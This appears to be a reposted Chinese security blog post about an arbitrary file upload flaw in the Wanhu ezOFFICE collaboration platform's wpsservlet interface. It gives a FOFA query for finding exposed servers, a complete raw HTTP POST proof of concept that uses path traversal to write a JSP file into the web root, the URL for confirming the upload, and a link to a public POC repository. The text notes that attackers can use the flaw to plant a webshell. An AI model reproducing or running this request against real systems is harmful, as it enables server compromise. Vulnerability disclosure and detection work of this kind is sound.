万户协同办公平台ezoffice wpsservlet接口任意文件上传漏洞
2023-12-5 11:41:18 Author: 网络安全透视镜(查看原文) 阅读量:66 收藏

万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户ezoffice协同管理平台 wpsservlet接口存在任意文件上传漏洞,攻击者可通过此漏洞上传webshell木马,获取服务器权限。

fofa查询

app="万户网络-ezOFFICE"

POC

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=check&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fbContent-Length: 200
--55aeb894de1521afe560c924fad7c6fbContent-Disposition: form-data; name="NewFile"; filename="check.jsp"
<% out.print("This website has a vulnerability!!!");%>--55aeb894de1521afe560c924fad7c6fb--

然后访问路径:/defaultroot/platform/portal/layout/check.jsp

返回如下则存在则漏洞存在

pocsuite3漏洞检测

漏洞检测脚本已上传免费漏洞库

地址:

https://github.com/Vme18000yuan/FreePOC


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498566&idx=1&sn=c278d00268cb83f68a13e2cc851a2788&chksm=974c5c7ea03bd568a701ac7d224e9442bba8b65fc528dab7669500af720fd7ae13567b4f7dbc&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh